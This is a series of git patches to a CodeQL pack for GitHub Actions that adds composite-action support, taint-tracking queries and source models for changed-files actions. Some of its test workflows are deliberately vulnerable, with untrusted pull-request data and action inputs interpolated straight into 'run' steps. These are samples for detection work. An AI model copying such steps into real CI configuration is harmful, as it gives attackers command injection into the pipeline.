.../CWE-020/CompositeActionSummaries.ql | 36 ++++++++ .../CWE-020/CompositeActionsSources.ql | 38 ++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- .../.github/workflows/calling_composite.yml | 14 +++ .../test/.github/workflows/changed-files.yml | 2 - ql/src/test/composite-actions/action.yml | 50 +++++++++++ 13 files changed, 243 insertions(+), 62 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionSummaries.ql create mode 100644 ql/src/Security/CWE-020/CompositeActionsSources.ql create mode 100644 ql/src/test/.github/workflows/calling_composite.yml create mode 100644 ql/src/test/composite-actions/action.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 61f2d8e91d76..0685b2fc14df 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -27,6 +27,25 @@ class Statement extends AstNode { } */ class Expression extends Statement { } +/** + * A composite action + */ +class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { + RunsStmt getRunsStmt() { result = super.getRuns() } + + InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class RunsStmt extends Statement instanceof Actions::Runs { + StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } + + StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } +} + /** * A Github Actions Workflow */ @@ -43,67 +62,45 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ReusableWorkflowInputsStmt getInputsStmt() { - result = workflow_call.(YamlMapping).lookup("inputs") - } + InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } - ReusableWorkflowOutputsStmt getOutputsStmt() { - result = workflow_call.(YamlMapping).lookup("outputs") - } + OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowInputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) - } +class InputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + InputsStmt() { parent.lookup("inputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. - * eg: - * on: - * workflow_call: - * inputs: - * config-path: - * required: true - * type: string - * secrets: - * token: - * required: true + * Gets a specific input expression (YamlMapping) by name. */ - ReusableWorkflowInputExpr getInputExpr(string name) { + InputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } +class OutputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; -class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowOutputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) - } + OutputsStmt() { parent.lookup("outputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. - * eg: - * on: - * workflow_call: - * outputs: - * firstword: - * description: "The first output string" - * value: ${{ jobs.example_job.outputs.output1 }} - * secondword: - * description: "The second output string" - * value: ${{ jobs.example_job.outputs.output2 }} + * Gets a specific output expression (YamlMapping) by name. */ - ReusableWorkflowOutputExpr getOutputExpr(string name) { + OutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class InputExpr extends Expression instanceof YamlString { } + +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -369,7 +366,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { } override Expression getRefExpr() { - this.getJobStmt() = result.(StepStmt).getJobStmt() and + this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId } } @@ -413,10 +410,10 @@ class JobOutputAccessExpr extends ExprAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { +class InputAccessExpr extends ExprAccessExpr { string paramName; - ReusableWorkflowInputAccessExpr() { + InputAccessExpr() { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } @@ -425,6 +422,11 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) + or + exists(CompositeActionStmt a | + a.getLocation().getFile() = this.getLocation().getFile() and + a.getInputsStmt().getInputExpr(paramName) = result + ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0dd34ff926f8..bb0c25dbdf68 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -88,6 +88,8 @@ module CfgScope { abstract class CfgScope extends AstNode { } class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + + class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } } private module Implementation implements CfgShared::InputSig { @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(WorkflowStmt), e) or + first(scope.(CompositeActionStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(WorkflowStmt), e, c) or + last(scope.(CompositeActionStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -139,6 +147,28 @@ private import CfgImpl private import Completion private import CfgScope +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + ( + child = this.(CompositeActionStmt).getInputsStmt() or + child = this.(CompositeActionStmt).getOutputsStmt() or + child = this.(CompositeActionStmt).getRunsStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { + override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +} + private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { if this instanceof ReusableWorkflowStmt @@ -169,8 +199,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt -{ +private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -183,10 +212,9 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } +private class InputExprTree extends LeafTree instanceof InputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt -{ +private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -199,7 +227,7 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 120444863e55..fae6c74b0b3c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -161,3 +161,14 @@ private class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = soutceType } } + +/** + * Composite action input sources + */ +private class CompositeActionInputSource extends RemoteFlowSource { + CompositeActionStmt c; + + CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + + override string getSourceType() { result = "Composite action input" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cafd60832760..750a4011320e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -83,7 +83,7 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { line = script.splitAt("\n") and ( line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ee59e25ab20a..79bd48b395a7 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -82,7 +82,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else none() + else + if this instanceof CompositeActionStmt + then result = this.(CompositeActionStmt).getName() + else none() } } @@ -190,11 +193,11 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { } /** - * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + exists(Expression astFrom, InputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index a14b06938746..d83608dc2b8d 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,7 +48,7 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private ReusableWorkflowInputExpr parameter; + private InputExpr parameter; ParameterNode() { this.asExpr() = parameter and @@ -63,7 +63,7 @@ class ParameterNode extends ExprNode { override Location getLocation() { result = parameter.getLocation() } - ReusableWorkflowInputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = parameter } } /** @@ -87,7 +87,8 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) + (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or + node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 36c268ecc99d..4b2be43bbdaf 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -45,7 +45,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof ReusableWorkflowOutputsStmt + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql new file mode 100644 index 000000000000..46a7797e2b27 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -0,0 +1,36 @@ +/** + * @name Composite Action Summaries + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-summaries + * @tags actions + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class OutputVariableSink extends DataFlow::Node { + OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, "Summary" diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql new file mode 100644 index 000000000000..09556ac1b78b --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -0,0 +1,38 @@ +/** + * @name Composite Action Sources + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sources + * @tags actions + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class OutputVariableSink extends DataFlow::Node { + OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and + not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 7953c3b037c7..6860f091d5e6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -6,7 +6,7 @@ * @problem.severity warning * @security-severity 9.3 * @precision high - * @id actions/command-injection + * @id actions/expression-injection * @tags actions * security * external/cwe/cwe-094 diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/src/test/.github/workflows/calling_composite.yml new file mode 100644 index 000000000000..79c2d072ef56 --- /dev/null +++ b/ql/src/test/.github/workflows/calling_composite.yml @@ -0,0 +1,14 @@ +on: [push] + +jobs: + hello_world_job: + runs-on: ubuntu-latest + name: A job to say hello + steps: + - uses: actions/checkout@v4 + - id: foo + uses: some-org/test-action@v1 + with: + who-to-greet: ${{ github.event.pull_request.head.ref }} + - run: echo ${{ steps.foo.outputs.reflected}} + - run: echo ${{ steps.foo.outputs.tainted}} diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml index 0a47960517f5..12bade510ba4 100644 --- a/ql/src/test/.github/workflows/changed-files.yml +++ b/ql/src/test/.github/workflows/changed-files.yml @@ -13,8 +13,6 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - # Example 1 - name: Get changed files id: changed-files uses: tj-actions/changed-files@v40 diff --git a/ql/src/test/composite-actions/action.yml b/ql/src/test/composite-actions/action.yml new file mode 100644 index 000000000000..c43d5fd66946 --- /dev/null +++ b/ql/src/test/composite-actions/action.yml @@ -0,0 +1,50 @@ +name: 'Hello World' +description: 'Greet someone' +inputs: + who-to-greet: # id of input + description: 'Who to greet' + required: true + default: 'World' +outputs: + reflected: + description: "Reflected input" + value: ${{ steps.reflector.outputs.reflected }} + tainted: + description: "Reflected input" + value: ${{ steps.source.outputs.tainted}} + +runs: + using: "composite" + steps: + - name: Secure Set Greeting + run: echo "Hello $INPUT_WHO_TO_GREET." + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - name: Remove foo + id: replace + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ inputs.who-to-greet }} + find: 'foo' + replace: '' + - id: sink + run: echo ${{ steps.replace.outputs.value }} + shell: bash + - name: Vulnerable Set Greeting + run: echo "Hello ${{ inputs.who-to-greet }}." + shell: bash + - id: reflector + run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - id: changed-files + uses: tj-actions/changed-files@v40 + - id: source + run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT + shell: bash + env: + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + + From cc3f2eed68329d37539675aa3a15c3798495feb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:24:16 +0100 Subject: [PATCH 023/707] add characteristic predicates to InputExpr and OutputExpr --- ql/lib/codeql/actions/Ast.qll | 10 ++++++---- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +----- 2 files changed, 7 insertions(+), 9 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 0685b2fc14df..c7573dfb8399 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -96,11 +96,13 @@ class OutputsStmt extends Statement instanceof YamlMapping { } } -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class InputExpr extends Expression instanceof YamlString { } +class InputExpr extends Expression instanceof YamlString { + InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } +} -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class OutputExpr extends Expression instanceof YamlString { } +class OutputExpr extends Expression instanceof YamlString { + OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } +} /** * A Job is a collection of steps that run in an execution environment. diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index bb0c25dbdf68..8d044c827a28 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -35,11 +35,7 @@ module Completion { override string toString() { result = "BooleanCompletion(" + value + ")" } - override predicate isValidForSpecific(AstNode e) { - none() - // TODO: add support for conditional expressions? - //e = any(ConditionalExpression c).getCondition() - } + override predicate isValidForSpecific(AstNode e) { none() } override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } From 271c512f4d05ba0778c81b8c9e8b553560631a72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:40:22 +0100 Subject: [PATCH 024/707] better identification of Composite Actions input and output nodes --- ql/lib/codeql/actions/Ast.qll | 10 ++++++-- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++---------- .../CWE-020/CompositeActionSummaries.ql | 10 ++++---- .../CWE-020/CompositeActionsSources.ql | 13 +++++----- 4 files changed, 31 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c7573dfb8399..6307897685f8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -92,7 +92,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { * Gets a specific output expression (YamlMapping) by name. */ OutputExpr getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(name) = result } } @@ -101,7 +102,12 @@ class InputExpr extends Expression instanceof YamlString { } class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } + OutputExpr() { + exists(OutputsStmt outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index d83608dc2b8d..0204015ac22a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,22 +48,22 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private InputExpr input; ParameterNode() { - this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) + this.asExpr() = input and + input = any(InputsStmt s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } - override string toString() { result = parameter.toString() } + override string toString() { result = "input " + input.toString() } - override Location getLocation() { result = parameter.getLocation() } + override Location getLocation() { result = input.getLocation() } - InputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = input } } /** @@ -83,19 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private Cfg::Node node; + private OutputExpr output; ReturnNode() { - this.getCfgNode() = node and - (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or - node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) + this.asExpr() = output and + output = any(OutputsStmt s).getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "return " + node.toString() } + override string toString() { result = "output " + output.toString() } - override Location getLocation() { result = node.getLocation() } + override Location getLocation() { result = output.getLocation() } } /** Gets the node corresponding to `e`. */ diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 46a7797e2b27..00a70eeed2fb 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -15,16 +15,16 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { + source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 09556ac1b78b..f67811b3f5fa 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -15,18 +15,17 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and - not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + not source instanceof DataFlow::ParameterNode and + exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; From 68901e252c70cba0add42f17a7074fa29b17f37c Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 13:18:52 +0100 Subject: [PATCH 025/707] Add some changed-files sources --- .../codeql/actions/dataflow/ExternalFlow.qll | 2 +- ql/lib/ext/REMOVEME.model.yml | 6 --- .../ext/ahmadnassri_action-changed-files.yml | 9 +++++ ql/lib/ext/dorny_paths-filter.yml | 7 ++++ ...> frabert_replace-string-action.model.yml} | 0 ql/lib/ext/jitterbit_get-changed-files.yml | 19 +++++++++ ...actions-find-and-replace-string.model.yml} | 4 +- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ------------- ql/lib/ext/tj-actions_changed-files.model.yml | 39 +++++++++++++++++++ .../ext/tj-actions_verify-changed-files.yml | 7 ++++ 10 files changed, 83 insertions(+), 38 deletions(-) delete mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/ahmadnassri_action-changed-files.yml create mode 100644 ql/lib/ext/dorny_paths-filter.yml rename ql/lib/ext/{frabert-replace-string-action.model.yml => frabert_replace-string-action.model.yml} (100%) create mode 100644 ql/lib/ext/jitterbit_get-changed-files.yml rename ql/lib/ext/{mad9000-actions-find-and-replace-string.model.yml => mad9000_actions-find-and-replace-string.model.yml} (56%) delete mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_verify-changed-files.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6d..402372300fbd 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -22,7 +22,7 @@ predicate sinkModel(string action, string version, string input, string kind) { * Fields: * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag - * - input arg: sink node (prefixed with either `env.` or `input.`) + * - input: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind */ predicate sinkNode(DataFlow::ExprNode sink, string kind) { diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml deleted file mode 100644 index b21aa207bb25..000000000000 --- a/ql/lib/ext/REMOVEME.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sinkModel - data: - - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml new file mode 100644 index 000000000000..c5e4df09e3a4 --- /dev/null +++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ] diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml new file mode 100644 index 000000000000..c78e9e08e708 --- /dev/null +++ b/ql/lib/ext/dorny_paths-filter.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ] + - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ] diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert-replace-string-action.model.yml rename to ql/lib/ext/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml new file mode 100644 index 000000000000..8d2798f37367 --- /dev/null +++ b/ql/lib/ext/jitterbit_get-changed-files.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed 